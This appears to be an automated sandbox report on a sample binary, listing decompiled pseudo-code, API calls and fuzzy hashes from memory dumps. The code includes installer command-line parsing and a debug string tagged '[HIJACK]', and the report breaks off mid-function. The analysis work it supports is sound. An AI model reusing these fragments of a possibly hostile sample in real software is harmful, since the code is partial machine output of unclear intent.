                                                                                                                                                                    • Part of subcall function 10001D60: __vsnprintf_s.LIBCMT ref: 10001D77
                                                                                                                                                                  • OutputDebugStringA.KERNEL32(?,?,?,?,?,10022D49,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F293
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DebugExistsFileOutputPathString__vsnprintf_s_memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3726070730-0
                                                                                                                                                                  • Opcode ID: 38a1c629065592f6bfd2de089b35504f17c640c29cbcd8feaed5eabe39e1a170
                                                                                                                                                                  • Instruction ID: 59963c058c004c355ade2e5f334ded41505970929f005b43d63a195b67db6380
                                                                                                                                                                  • Opcode Fuzzy Hash: 38a1c629065592f6bfd2de089b35504f17c640c29cbcd8feaed5eabe39e1a170
                                                                                                                                                                  • Instruction Fuzzy Hash: 6BF090B9900348A7DB14CBE5DC45FE9B37EDB04A04F4440C8FB189B649EA70E7848BA2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1000F81F(intOrPtr _a4) {
                                                                                                                                                                  				void* _t6;
                                                                                                                                                                  				intOrPtr _t7;
                                                                                                                                                                  				void* _t10;
                                                                                                                                                                  
                                                                                                                                                                  				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                                                                                  				 *0x10335310 = _t6;
                                                                                                                                                                  				if(_t6 != 0) {
                                                                                                                                                                  					_t7 = E1000F7C4(__eflags);
                                                                                                                                                                  					__eflags = _t7 - 3;
                                                                                                                                                                  					 *0x10337f3c = _t7;
                                                                                                                                                                  					if(_t7 != 3) {
                                                                                                                                                                  						L5:
                                                                                                                                                                  						__eflags = 1;
                                                                                                                                                                  						return 1;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t10 = E1000FA94(0x3f8);
                                                                                                                                                                  						__eflags = _t10;
                                                                                                                                                                  						if(_t10 != 0) {
                                                                                                                                                                  							goto L5;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							HeapDestroy( *0x10335310);
                                                                                                                                                                  							 *0x10335310 =  *0x10335310 & 0x00000000;
                                                                                                                                                                  							goto L1;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					L1:
                                                                                                                                                                  					return 0;
                                                                                                                                                                  				}
                                                                                                                                                                  			}







                                                                                                                                                                  APIs
                                                                                                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,1000EA0F,00000001), ref: 1000F830
                                                                                                                                                                  • HeapDestroy.KERNEL32 ref: 1000F866
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$CreateDestroy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3296620671-0
                                                                                                                                                                  • Opcode ID: 93a6f002e55d1f2c72530dbf700ee14f565e4e658e751c809a659bb994ece646
                                                                                                                                                                  • Instruction ID: 18601b020fc9775d6ac859e2e5d9de66436f62596d67e2443513b26528c1d1d3
                                                                                                                                                                  • Opcode Fuzzy Hash: 93a6f002e55d1f2c72530dbf700ee14f565e4e658e751c809a659bb994ece646
                                                                                                                                                                  • Instruction Fuzzy Hash: 0DE06574628312ABF700EB314C897A535D8E7807D2F21483DF404C84E5FFA0C640A741
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExA.KERNELBASE(00000000,00000000,00000000), ref: 00428532
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                  • Opcode ID: 4a3c49af93ba79db0bc14ebb5469e7102d4c44c77b7e0d30c7dd675cd8bf6e47
                                                                                                                                                                  • Instruction ID: ef7ca6d443df36ec8b89651c04e473b2a384ca014817e2868d41c5fb65919ee0
                                                                                                                                                                  • Opcode Fuzzy Hash: 4a3c49af93ba79db0bc14ebb5469e7102d4c44c77b7e0d30c7dd675cd8bf6e47
                                                                                                                                                                  • Instruction Fuzzy Hash: 2551C974E0121ADFDB04CF88D890BAEB7B1FF48304F648599D515AB391C734A991CF99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001A3A8() {
                                                                                                                                                                  				intOrPtr _t4;
                                                                                                                                                                  				void* _t6;
                                                                                                                                                                  
                                                                                                                                                                  				RegCloseKey( *(_t6 - 4)); // executed
                                                                                                                                                                  				_t4 =  *((intOrPtr*)(_t6 - 8));
                                                                                                                                                                  				return _t4;
                                                                                                                                                                  			}





                                                                                                                                                                  0x1001a3b5
                                                                                                                                                                  0x1001a3bb
                                                                                                                                                                  0x1001a3c1

                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.KERNELBASE(00000000), ref: 1001A3B5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                  • Opcode ID: 4a63e03739b60fead9fdaeed387a206de6423b00f649f4b4298aa4d1403a3e1c
                                                                                                                                                                  • Instruction ID: facc41993b3c1af09304e29cf976f720d8779abb0dabb2bdd366089c3a2d3d5b
                                                                                                                                                                  • Opcode Fuzzy Hash: 4a63e03739b60fead9fdaeed387a206de6423b00f649f4b4298aa4d1403a3e1c
                                                                                                                                                                  • Instruction Fuzzy Hash: 97B09239A00208ABCB24CB90D98496CB7B5EB49211B2002C8FE0957300CA329E909B90
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E10019710() {
                                                                                                                                                                  				intOrPtr _t2;
                                                                                                                                                                  
                                                                                                                                                                  				EnumWindows(E10019430, 0);
                                                                                                                                                                  				_t2 =  *0x10335dcc; // 0x0
                                                                                                                                                                  				return _t2;
                                                                                                                                                                  			}




                                                                                                                                                                  0x1001971a
                                                                                                                                                                  0x10019720
                                                                                                                                                                  0x10019726

                                                                                                                                                                  APIs
                                                                                                                                                                  • EnumWindows.USER32(10019430,00000000), ref: 1001971A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumWindows
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1129996299-0
                                                                                                                                                                  • Opcode ID: a7eba7f491d23658f48507abf630147bde2ae6f3d70c73b7c6eb4142ddaa2826
                                                                                                                                                                  • Instruction ID: b52a782fc5a630541d4b441021bffe907a2dd7d3096b3a676bb7090c7594124f
                                                                                                                                                                  • Opcode Fuzzy Hash: a7eba7f491d23658f48507abf630147bde2ae6f3d70c73b7c6eb4142ddaa2826
                                                                                                                                                                  • Instruction Fuzzy Hash: 93B01230140329A7D2009795DCCAF4577BCF354A18F520001F70C4A6A2CB71B4528555
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                                  			E1000EC31(void* __ebx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                  				void* _t5;
                                                                                                                                                                  				void* _t13;
                                                                                                                                                                  
                                                                                                                                                                  				E100152B4();
                                                                                                                                                                  				_push(_a4);
                                                                                                                                                                  				_t5 = L1000EB34(__ebx, _a12, _a8, __edi, __esi, _t13); // executed
                                                                                                                                                                  				return _t5;
                                                                                                                                                                  			}





                                                                                                                                                                  0x1000ec31
                                                                                                                                                                  0x1000ec36
                                                                                                                                                                  0x1000ec42
                                                                                                                                                                  0x1000ec48

                                                                                                                                                                  APIs
                                                                                                                                                                  • ___security_init_cookie.LIBCMT ref: 1000EC31
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ___security_init_cookie
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3657697845-0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000065,00000000,00001000,00000004,?,00427EC2,?,?), ref: 0042823F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                                  			E00410095(void* __ecx, intOrPtr* _a4, int* _a8, intOrPtr _a12, intOrPtr _a16, int* _a20, int* _a24, int* _a28, int* _a32, signed int* _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
                                                                                                                                                                  				int _v8;
                                                                                                                                                                  				short* _v12;
                                                                                                                                                                  				int _v16;
                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                  				int _t188;
                                                                                                                                                                  				int* _t189;
                                                                                                                                                                  				int* _t190;
                                                                                                                                                                  				void* _t191;
                                                                                                                                                                  				signed int _t195;
                                                                                                                                                                  				int* _t208;
                                                                                                                                                                  				int _t241;
                                                                                                                                                                  				int _t280;
                                                                                                                                                                  				int _t286;
                                                                                                                                                                  				int _t308;
                                                                                                                                                                  				WCHAR* _t309;
                                                                                                                                                                  				int _t316;
                                                                                                                                                                  				int _t321;
                                                                                                                                                                  				short* _t322;
                                                                                                                                                                  				int _t323;
                                                                                                                                                                  				signed int _t329;
                                                                                                                                                                  				signed short* _t330;
                                                                                                                                                                  				int* _t357;
                                                                                                                                                                  				signed int _t360;
                                                                                                                                                                  				int _t366;
                                                                                                                                                                  				signed short _t373;
                                                                                                                                                                  				intOrPtr* _t377;
                                                                                                                                                                  				signed int _t379;
                                                                                                                                                                  				signed int _t380;
                                                                                                                                                                  				intOrPtr* _t382;
                                                                                                                                                                  				signed short* _t383;
                                                                                                                                                                  				int* _t386;
                                                                                                                                                                  				int* _t387;
                                                                                                                                                                  				int _t388;
                                                                                                                                                                  				void* _t391;
                                                                                                                                                                  				intOrPtr* _t394;
                                                                                                                                                                  				intOrPtr* _t395;
                                                                                                                                                                  				int* _t396;
                                                                                                                                                                  				intOrPtr* _t397;
                                                                                                                                                                  				int* _t398;
                                                                                                                                                                  				int _t401;
                                                                                                                                                                  				intOrPtr _t402;
                                                                                                                                                                  				intOrPtr _t403;
                                                                                                                                                                  				signed int _t404;
                                                                                                                                                                  				int _t405;
                                                                                                                                                                  				void* _t410;
                                                                                                                                                                  				int _t411;
                                                                                                                                                                  				void* _t415;
                                                                                                                                                                  
                                                                                                                                                                  				_t401 = 0;
                                                                                                                                                                  				_t377 = _a4;
                                                                                                                                                                  				_t188 = 0;
                                                                                                                                                                  				_t410 = 0;
                                                                                                                                                                  				_t405 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				if(_t377 == 0 ||  *_t377 == 0) {
                                                                                                                                                                  					L10:
                                                                                                                                                                  					_t379 = 1;
                                                                                                                                                                  					if(_t188 <= 1) {
                                                                                                                                                                  						L131:
                                                                                                                                                                  						_t189 = _a20;
                                                                                                                                                                  						if( *_t189 == 3) {
                                                                                                                                                                  							L147:
                                                                                                                                                                  							if( *_t189 != 2) {
                                                                                                                                                                  								L135:
                                                                                                                                                                  								_t190 = _a8;
                                                                                                                                                                  								L136:
                                                                                                                                                                  								if( *_t190 == _t401) {
                                                                                                                                                                  									 *_t190 = 4;
                                                                                                                                                                  								}
                                                                                                                                                                  								if(_t190[1] == _t401) {
                                                                                                                                                                  									_t190[1] = 4;
                                                                                                                                                                  								}
                                                                                                                                                                  								if(_t190[2] == _t401) {
                                                                                                                                                                  									_t190[2] = 2;
                                                                                                                                                                  								}
                                                                                                                                                                  								goto L142;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t190 = _a8;
                                                                                                                                                                  							_t190[1] = 1;
                                                                                                                                                                  							goto L136;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t382 = _a28;
                                                                                                                                                                  						if( *_t382 == 2 ||  *_t382 == 3) {
                                                                                                                                                                  							 *_t189 = 1;
                                                                                                                                                                  							goto L135;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							goto L147;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t402 = 0x2f;
                                                                                                                                                                  						_a4 = 0x2d;
                                                                                                                                                                  						_v20 = _t402;
                                                                                                                                                                  						while(1) {
                                                                                                                                                                  							_t383 =  *(_t410 + _t379 * 4);
                                                                                                                                                                  							_t195 =  *_t383 & 0x0000ffff;
                                                                                                                                                                  							if(_t195 == _a4 || _t195 == _t402) {
                                                                                                                                                                  								goto L14;
                                                                                                                                                                  							}
                                                                                                                                                                  							L109:
                                                                                                                                                                  							E004312A7( &(_a8[3]),  *(_t410 + _t379 * 4));
                                                                                                                                                                  							L117:
                                                                                                                                                                  							_t401 = 0;
                                                                                                                                                                  							L118:
                                                                                                                                                                  							_t379 = _t379 + 1;
                                                                                                                                                                  							if(_t379 >= _v8) {
                                                                                                                                                                  								goto L131;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t402 = 0x2f;
                                                                                                                                                                  							continue;
                                                                                                                                                                  							L14:
                                                                                                                                                                  							_t16 =  &(_t383[1]); // 0x402241
                                                                                                                                                                  							if(CompareStringW(0x7f, 1, _t16, 0xffffffff, "l", 0xffffffff) == 2 || CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"log", 0xffffffff) == 2) {
                                                                                                                                                                  								_t198 = _a36;
                                                                                                                                                                  								 *_a36 =  *_a36 & 0xfffffffe;
                                                                                                                                                                  								_t379 = _t379 + 1;
                                                                                                                                                                  								if(_t379 >= _v8) {
                                                                                                                                                                  									_t411 = 0x80070057;
                                                                                                                                                                  									E004300D9(_t198, "core.cpp", 0x399, 0x80070057);
                                                                                                                                                                  									_push("Must specify a path for log.");
                                                                                                                                                                  									goto L127;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t405 = E00433F88(_a40,  *(_t410 + _t379 * 4), 0);
                                                                                                                                                                  								if(_t405 < 0) {
                                                                                                                                                                  									_push("Failed to copy log file path.");
                                                                                                                                                                  									goto L103;
                                                                                                                                                                  								}
                                                                                                                                                                  								goto L117;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, "?", 0xffffffff) == 2 || CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, "h", 0xffffffff) == 2 || CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"help", 0xffffffff) == 2) {
                                                                                                                                                                  									_t208 = _a8;
                                                                                                                                                                  									goto L95;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, "q", 0xffffffff) == 2 || CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"quiet", 0xffffffff) == 2 || CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, "s", 0xffffffff) == 2 || CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"silent", 0xffffffff) == 2) {
                                                                                                                                                                  										_t386 = _a8;
                                                                                                                                                                  										_t401 = 0;
                                                                                                                                                                  										 *(_t386 + 4) = 2;
                                                                                                                                                                  										if( *(_t386 + 8) == 0) {
                                                                                                                                                                  											 *(_t386 + 8) = 3;
                                                                                                                                                                  										}
                                                                                                                                                                  										goto L118;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"passive", 0xffffffff) != 2) {
                                                                                                                                                                  											if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"norestart", 0xffffffff) != 2) {
                                                                                                                                                                  												if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"forcerestart", 0xffffffff) != 2) {
                                                                                                                                                                  													if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"promptrestart", 0xffffffff) != 2) {
                                                                                                                                                                  														_t241 = CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"layout", 0xffffffff);
                                                                                                                                                                  														_t403 = 2;
                                                                                                                                                                  														if(_t241 != _t403) {
                                                                                                                                                                  															if(CompareStringW(0x7f, 1,  *(_t410 + _t379 * 4) + _t403, 0xffffffff, L"uninstall", 0xffffffff) != 2) {
                                                                                                                                                                  																if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"repair", 0xffffffff) != 2) {
                                                                                                                                                                  																	if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"modify", 0xffffffff) != 2) {
                                                                                                                                                                  																		if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"package", 0xffffffff) == 2 || CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"update", 0xffffffff) == 2) {
                                                                                                                                                                  																			_t387 = _a8;
                                                                                                                                                                  																			_t401 = 0;
                                                                                                                                                                  																			if( *_t387 == 0) {
                                                                                                                                                                  																				 *_t387 = 4;
                                                                                                                                                                  																			}
                                                                                                                                                                  																		} else {
                                                                                                                                                                  																			if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"noaupause", 0xffffffff) != 2) {
                                                                                                                                                                  																				if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"keepaupaused", 0xffffffff) != 2) {
                                                                                                                                                                  																					if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"parent", 0xffffffff) != 2) {
                                                                                                                                                                  																						if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"parent:none", 0xffffffff) != 2) {
                                                                                                                                                                  																							if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"burn.log.append", 0xffffffff) != 2) {
                                                                                                                                                                  																								if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"burn.elevated", 0xffffffff) != 2) {
                                                                                                                                                                  																									if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"burn.unelevated", 0xffffffff) != 2) {
                                                                                                                                                                  																										_t280 = CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"burn.embedded", 0xffffffff);
                                                                                                                                                                  																										_t388 = 2;
                                                                                                                                                                  																										if(_t280 != _t388) {
                                                                                                                                                                  																											if(CompareStringW(0x7f, 1,  *(_t410 + _t379 * 4) + _t388, 0xffffffff, L"burn.related.detect", 0xffffffff) != 2) {
                                                                                                                                                                  																												_t286 = CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"burn.related.upgrade", 0xffffffff);
                                                                                                                                                                  																												_push(2);
                                                                                                                                                                  																												_pop(1);
                                                                                                                                                                  																												if(_t286 == 1) {
                                                                                                                                                                  																													L81:
                                                                                                                                                                  																													_a8[7] = 1;
                                                                                                                                                                  																													_push(E0040E82A(1));
                                                                                                                                                                  																													_push(0x20000003);
                                                                                                                                                                  																													L82:
                                                                                                                                                                  																													_push(2);
                                                                                                                                                                  																													E00402003();
                                                                                                                                                                  																													_t415 = _t415 + 0xc;
                                                                                                                                                                  																													goto L117;
                                                                                                                                                                  																												}
                                                                                                                                                                  																												if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[0]), 0xffffffff, L"burn.related.addon", 0xffffffff) != 2) {
                                                                                                                                                                  																													if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"burn.related.patch", 0xffffffff) != 2) {
                                                                                                                                                                  																														if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"burn.related.update", 0xffffffff) != 2) {
                                                                                                                                                                  																															if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"burn.passthrough", 0xffffffff) != 2) {
                                                                                                                                                                  																																if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"burn.disable.unelevate", 0xffffffff) != 2) {
                                                                                                                                                                  																																	if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), 0xffffffff, L"burn.runonce", 0xffffffff) != 2) {
                                                                                                                                                                  																																		_t308 = lstrlenW(L"burn.ignoredependencies");
                                                                                                                                                                  																																		_t309 = L"burn.ignoredependencies";
                                                                                                                                                                  																																		if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), lstrlenW(_t309), _t309, _t308) != 2) {
                                                                                                                                                                  																																			_t316 = lstrlenW( &(( *(_t410 + _t379 * 4))[1]));
                                                                                                                                                                  																																			if(_t316 < lstrlenW(L"burn.")) {
                                                                                                                                                                  																																				_t410 = _v16;
                                                                                                                                                                  																																				goto L109;
                                                                                                                                                                  																																			}
                                                                                                                                                                  																																			_t321 = lstrlenW(L"burn.");
                                                                                                                                                                  																																			_t322 = L"burn.";
                                                                                                                                                                  																																			_t323 = lstrlenW(_t322);
                                                                                                                                                                  																																			_t410 = _v16;
                                                                                                                                                                  																																			if(CompareStringW(0x7f, 1,  &(( *(_t410 + _t379 * 4))[1]), _t323, _t322, _t321) != 2) {
                                                                                                                                                                  																																				goto L109;
                                                                                                                                                                  																																			}
                                                                                                                                                                  																																			_push( &(( *(_t410 + _t379 * 4))[1]));
                                                                                                                                                                  																																			_push(0xa0000002);
                                                                                                                                                                  																																			goto L82;
                                                                                                                                                                  																																		}
                                                                                                                                                                  																																		_t329 = lstrlenW(L"burn.ignoredependencies");
                                                                                                                                                                  																																		_t330 =  &(( *(_t410 + _t379 * 4))[_t329]);
                                                                                                                                                                  																																		_t391 = 0x3d;
                                                                                                                                                                  																																		if(_t391 != _t330[1] || 0 ==  *_t330) {
                                                                                                                                                                  																																			E004300D9(_t330, "core.cpp", 0x480, 0x80070057);
                                                                                                                                                                  																																			_t405 = 0x80070057;
                                                                                                                                                                  																																			E00430A57(0x80070057, "Missing required parameter for switch: %ls", L"burn.ignoredependencies");
                                                                                                                                                                  																																			goto L142;
                                                                                                                                                                  																																		} else {
                                                                                                                                                                  																																			_t405 = E00433F88(_a48, _t330, 0);
                                                                                                                                                                  																																			if(_t405 >= 0) {
                                                                                                                                                                  																																				goto L117;
                                                                                                                                                                  																																			}
                                                                                                                                                                  																																			_push("Failed to allocate the list of dependencies to ignore.");
                                                                                                                                                                  																																			L103:
                                                                                                                                                                  																																			_push(_t405);
                                                                                                                                                                  																																			L104:
                                                                                                                                                                  																																			E00430A57();
                                                                                                                                                                  																																			L142:
                                                                                                                                                                  																																			_t191 = _v16;
                                                                                                                                                                  																																			if(_t191 != 0) {
                                                                                                                                                                  																																				LocalFree(_t191);
                                                                                                                                                                  																																			}
                                                                                                                                                                  																																			goto L144;
                                                                                                                                                                  																																		}
                                                                                                                                                                  																																	}
                                                                                                                                                                  																																	 *_a20 = 3;
                                                                                                                                                                  																																	goto L117;
                                                                                                                                                                  																																}
                                                                                                                                                                  																																_t208 = _a32;
                                                                                                                                                                  																																L95:
                                                                                                                                                                  																																 *_t208 = 1;
                                                                                                                                                                  																																goto L117;
                                                                                                                                                                  																															}
                                                                                                                                                                  																															_a8[8] = 1;
                                                                                                                                                                  																															goto L117;
                                                                                                                                                                  																														}
                                                                                                                                                                  																														_push(6);
                                                                                                                                                                  																														L86:
                                                                                                                                                                  																														_pop(1);
                                                                                                                                                                  																														goto L81;
                                                                                                                                                                  																													}
                                                                                                                                                                  																													_push(4);
                                                                                                                                                                  																													goto L86;
                                                                                                                                                                  																												}
                                                                                                                                                                  																												_push(3);
                                                                                                                                                                  																												goto L86;
                                                                                                                                                                  																											}
                                                                                                                                                                  																											goto L81;
                                                                                                                                                                  																										}
                                                                                                                                                                  																										_t117 = _t379 + 3; // 0x402286
                                                                                                                                                                  																										_t336 = _t117;
                                                                                                                                                                  																										if(_t117 >= _v8) {
                                                                                                                                                                  																											_t411 = 0x80070057;
                                                                                                                                                                  																											E004300D9(_t336, "core.cpp", 0x444, 0x80070057);
